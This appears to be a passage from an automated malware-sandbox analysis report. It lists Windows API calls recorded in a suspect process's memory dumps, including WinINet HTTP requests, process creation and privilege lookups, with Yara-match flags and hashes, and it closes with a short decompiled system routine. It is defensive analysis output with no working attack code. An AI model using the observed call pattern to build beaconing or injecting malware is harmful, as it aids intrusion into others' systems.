                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 008E8D68
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HttpOpenRequest
                                                          • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                          • API String ID: 1984915467-4016285707
                                                          • Opcode ID: d6f2293e289eb378facfdd4d12d549743cd2bd2600536a02b73cda7f060483b9
                                                          • Instruction ID: 872375572ffbdc0c902e028602549bbd3b2064a59e38f8083f5ec7ed2ecaa183
                                                          • Opcode Fuzzy Hash: d6f2293e289eb378facfdd4d12d549743cd2bd2600536a02b73cda7f060483b9
                                                          • Instruction Fuzzy Hash: D70117B2905159AFCB14DF89C881DEF7BB9EF49210F158258FE19A7205D770AE10CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 008E8D68
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HttpOpenRequest
                                                          • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                          • API String ID: 1984915467-4016285707
                                                          • Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
                                                          • Instruction ID: b6f570ed81eee8d7f4601b9882a3de936ab746373c7e94b7c43c15454f0ba4b3
                                                          • Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
                                                          • Instruction Fuzzy Hash: 5D0129B2A04159AFCB04DF89D841DEF7BB8EB48210F158288FD08A7204D670ED10CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 008E8DDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HttpRequestSend
                                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                          • API String ID: 360639707-2503632690
                                                          • Opcode ID: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
                                                          • Instruction ID: df0c2c42612a1b19e416dc69678fc92ac95a2178e751b83abb553a9292668d87
                                                          • Opcode Fuzzy Hash: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
                                                          • Instruction Fuzzy Hash: 14014FB2905159AFCB04DF98DC419BF7BB8EB55210F148189FD18A7204D670EE10CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 008E8DDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HttpRequestSend
                                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                          • API String ID: 360639707-2503632690
                                                          • Opcode ID: 61e223e2e41545bb5a542d46ac6cf8dd9f7556d4fd82f89db3add265ccd40570
                                                          • Instruction ID: 096fcd2543e40d33ab1e2e83affc7e85145b60ad16d1f3018de37d3310eba77e
                                                          • Opcode Fuzzy Hash: 61e223e2e41545bb5a542d46ac6cf8dd9f7556d4fd82f89db3add265ccd40570
                                                          • Instruction Fuzzy Hash: 4A0171B6905158AFCB05DF88C8819EF7B78FB55310F158188FD58AB305D670DA11CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 008E8CE8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ConnectInternet
                                                          • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                          • API String ID: 3050416762-1024195942
                                                          • Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
                                                          • Instruction ID: df17fb12b3c7542c5c29a61c737e30b85fb76c15e34054b9aae5cb4f2415f1d6
                                                          • Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
                                                          • Instruction Fuzzy Hash: 8F0117B2915158AFCB04DF99D941EEF77B8EB49310F154288BE08A7200D670EE10CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 008E8CE8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ConnectInternet
                                                          • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                          • API String ID: 3050416762-1024195942
                                                          • Opcode ID: 7a8d0b4aaa42a17314481f7c81c53dfc4ffc06010af496b8ce285bdfd1203230
                                                          • Instruction ID: dc7e72efe78f98e06f67b4a52783206cdab4344bd17513b8d26827437475d883
                                                          • Opcode Fuzzy Hash: 7a8d0b4aaa42a17314481f7c81c53dfc4ffc06010af496b8ce285bdfd1203230
                                                          • Instruction Fuzzy Hash: 210129B2905159AFCB04DF89C941EEF7BB8FB49310F154188BA48A7201D630EE00CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 008E8C67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                          • API String ID: 2038078732-3155091674
                                                          • Opcode ID: 38aa428edcbc849fd8fc82926e7c3601fc6bdd5e5f627d3bda20e054d3f7b5d9
                                                          • Instruction ID: 36414fa1204ed87f381a1b618780015f96e63c9b0d816a2fbe82990d3025f8e3
                                                          • Opcode Fuzzy Hash: 38aa428edcbc849fd8fc82926e7c3601fc6bdd5e5f627d3bda20e054d3f7b5d9
                                                          • Instruction Fuzzy Hash: 50014FB2901118AF8B14DF99D841DBF77B8FF89310B148589FE1897305D671AA158BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 008E8C67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                          • API String ID: 2038078732-3155091674
                                                          • Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                                          • Instruction ID: e6d1c318f16aa8c62c42166c16bb42879b6834b32c1d9e18ec386bb507403df0
                                                          • Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                                          • Instruction Fuzzy Hash: 7AF0F6B2911119AF8B14DF99D8419ABB7B8FB49310B148589BE1897201D675AA108BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 008E73B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 538abed265c5d158ddd0c2efc6e16d8eadf2debc70b5946eeebfa6a3d8b33158
                                                          • Instruction ID: c0111c7c603a178e745479a4212ff3abe6425b4a4169bfc920637d2e37bb05bb
                                                          • Opcode Fuzzy Hash: 538abed265c5d158ddd0c2efc6e16d8eadf2debc70b5946eeebfa6a3d8b33158
                                                          • Instruction Fuzzy Hash: 7831B0B6505644ABC725EF69D8A1FA7B7B8FF49700F00811DFA1A9B241D730B905CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 008E73B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 939127b118d82a9eb10805802b6429313c7bb0ea197e41f9d0a410ea7827cac7
                                                          • Instruction ID: d3e28ec6a2dd4b3a55a33b2043851bca2a03f0050644881402d19cbc498617ef
                                                          • Opcode Fuzzy Hash: 939127b118d82a9eb10805802b6429313c7bb0ea197e41f9d0a410ea7827cac7
                                                          • Instruction Fuzzy Hash: 063125B2605240ABC720DF69D8A1FABBBB4FF49700F04811DFA1D9B241D330A915CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,008DCD00,?,?), ref: 008E747C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID: net.dll
                                                          • API String ID: 2422867632-2431746569
                                                          • Opcode ID: e286031f62f0bc3e297b41ad71bf2e3d5a4f00c8f7150558820bd95c27e2468c
                                                          • Instruction ID: 3c55f8c3dc391f8b3ced2e223c33770b64b645036b1c3e03b2c03a0f891a549f
                                                          • Opcode Fuzzy Hash: e286031f62f0bc3e297b41ad71bf2e3d5a4f00c8f7150558820bd95c27e2468c
                                                          • Instruction Fuzzy Hash: BF110A331066446AD3319A69CC62FE3B394FB82714F04451DF65AD6280D774B80587D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,008D3B93), ref: 008E892D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: f735297bcb19e8819810ec2c8635aa4de55d98f253bbdaf08e1e851547a1c03d
                                                          • Instruction ID: a99f4f1923053ee03a8a55540425ca5b7e582553d4f56f137c8a39d3ca1582ab
                                                          • Opcode Fuzzy Hash: f735297bcb19e8819810ec2c8635aa4de55d98f253bbdaf08e1e851547a1c03d
                                                          • Instruction Fuzzy Hash: BCF09071604204AFD710EF98CC80EE777A8EF88314F008058F95C97602C630EA10CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,008D3B93), ref: 008E892D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: dafd2a928def7814c11446e5574e5715dafde7ed70e389063fbb62533d304a82
                                                          • Instruction ID: 90c23e2024d20a9494be2f3c4fe61d8caf9a8eda5dd7a37da10b74c579528194
                                                          • Opcode Fuzzy Hash: dafd2a928def7814c11446e5574e5715dafde7ed70e389063fbb62533d304a82
                                                          • Instruction Fuzzy Hash: 3CE01AB1200604AFDB24DF69CC8AEEB7769FF88350F118658FD09A7352C631E911CAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,008D3B93), ref: 008E892D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction ID: 9dbed0dc83ca9aaf3986471075e5e58b697f3583c4e87fb600d74ee1f14d4b72
                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction Fuzzy Hash: A7E04FB1200208ABD714DF59CC49EA777ACEF88750F014558FD0857242C630F910CAF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008D72EA
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008D730B
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                          • Instruction ID: 178d03e7a9906b03bbf20cbe37cf04742551224825995b243b06208c8c845a06
                                                          • Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                          • Instruction Fuzzy Hash: A901A231A802287AE725AA999C03FBE776CEB01F51F050119FF04FA2C1E6947A0647F6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 008D9BC2
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                          • Instruction ID: cf5fc289d463646d7b9285bcfe59ad7cb188fe0b9ebdecde81c17dbc545293dc
                                                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                          • Instruction Fuzzy Hash: 180100B5D0020DA7DB10DAA5DC42F9EB778EB54308F004295E908D7241F671EA148B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008E89C4
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: cf32374952cb51b4a0f2cd9f729cf0958ca19471adce439456f685f6ac545d6f
                                                          • Instruction ID: b139bc567ba080da3aae610225d5d79a3f63f8d64003c1871310541f47e74bd2
                                                          • Opcode Fuzzy Hash: cf32374952cb51b4a0f2cd9f729cf0958ca19471adce439456f685f6ac545d6f
                                                          • Instruction Fuzzy Hash: 0B01DDB2200108ABCB04DF89CC80EEB37A9BF8C750F118208BA0DE7241C630E841CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008E89C4
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction ID: f078c363aacc01f698354d1256847e050f6a6b1a897d37ce522d39aca222bff3
                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction Fuzzy Hash: 4101AFB2214108ABCB54DF8DDC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,008DCD00,?,?), ref: 008E747C
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                          • Instruction ID: 66a5bdd46025f7c960c2db392d97c8c2421d12f2aa3a006220783eaf42e53d89
                                                          • Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                          • Instruction Fuzzy Hash: 22E092333803543AE330659E9C03FA7B39CDB82B34F150426FA0DEB2C1D995F90142A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,008DCFD2,008DCFD2,?,00000000,?,?), ref: 008E8A90
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: b46b039edea0e6df02f5fabe01e86e39dc836000839f91e8b3942128922ef66e
                                                          • Instruction ID: c874621326cfffca957033e437119ef2dee06b1eb51af6a5f1e36f2000a01869
                                                          • Opcode Fuzzy Hash: b46b039edea0e6df02f5fabe01e86e39dc836000839f91e8b3942128922ef66e
                                                          • Instruction Fuzzy Hash: F1E0E579104210AFDB109BE9D844DEB7B9CFF81360B048657F95DCB612C630E92586A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,008DCFD2,008DCFD2,?,00000000,?,?), ref: 008E8A90
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 924556bb0c096b962c3324a2fcb7559adc0890ece0181f16ab3a979748322075
                                                          • Instruction ID: 7d3a1f33499741786566d97499d6d579bd1c01d8223ee995301a247f514c3bd6
                                                          • Opcode Fuzzy Hash: 924556bb0c096b962c3324a2fcb7559adc0890ece0181f16ab3a979748322075
                                                          • Instruction Fuzzy Hash: CBF0A0B5610214AFDB14DF55DC41EEB77A8EF85750F108169F90D97241CA3194018FB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(008E3546,?,008E3CBF,008E3CBF,?,008E3546,?,?,?,?,?,00000000,00000000,?), ref: 008E88ED
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction ID: 12c4248496d2efa0d49578e1835bd5b2e96ddc0b6e0739bce4a9c9b2430df045
                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction Fuzzy Hash: B2E012B1200208ABDB14EF99CC85EA777ACFF88650F118558FE089B242C630F910CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,008DCFD2,008DCFD2,?,00000000,?,?), ref: 008E8A90
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction ID: 95669d9ca40a811e37116e5994f846dd759dd59e3da94a23a64a2f5eab609e7f
                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction Fuzzy Hash: B1E01AB1200208ABDB10DF49CC85EE737ADEF89650F018154FE0857242C934E8108BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,008D7C93,?), ref: 008DD46B
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                          • Instruction ID: 8146df77547f5cfc904ac05cadf8a4d5d0728847b815ff0abb16b870f15ae034
                                                          • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                          • Instruction Fuzzy Hash: 75D0A7717503087BE610FAA89C07F6633CDAB45B00F494064F949D73C3D960F9004165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 46b71691a7d0934ef13d22d733885ae913be6d5d81c549b686035e754971301d
                                                          • Instruction ID: 2af99b5fec2dc05dcf0ca27f67f6432c05b3a299e9841021ce4b4492eaeedb70
                                                          • Opcode Fuzzy Hash: 46b71691a7d0934ef13d22d733885ae913be6d5d81c549b686035e754971301d
                                                          • Instruction Fuzzy Hash: 2BB09BF19014C5C5F751D7614A087277A1577D0745F27C052D2030641A477CD1D1F5B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 53%
                                                          			E04D3FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                          				void* _t7;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t10;
                                                          				intOrPtr* _t12;
                                                          				intOrPtr* _t13;
                                                          				intOrPtr _t14;
                                                          				intOrPtr* _t15;
                                                          
                                                          				_t13 = __edx;
                                                          				_push(_a4);
                                                          				_t14 =  *[fs:0x18];
                                                          				_t15 = _t12;
                                                          				_t7 = E04CECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                          				_push(_t13);
                                                          				E04D35720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                          				_t9 =  *_t15;
                                                          				if(_t9 == 0xffffffff) {
                                                          					_t10 = 0;
                                                          				} else {
                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                          				}
                                                          				_push(_t10);
                                                          				_push(_t15);
                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                          				return E04D35720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                          			}











                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D3FDFA
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D3FE01
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D3FE2B
                                                          Memory Dump Source
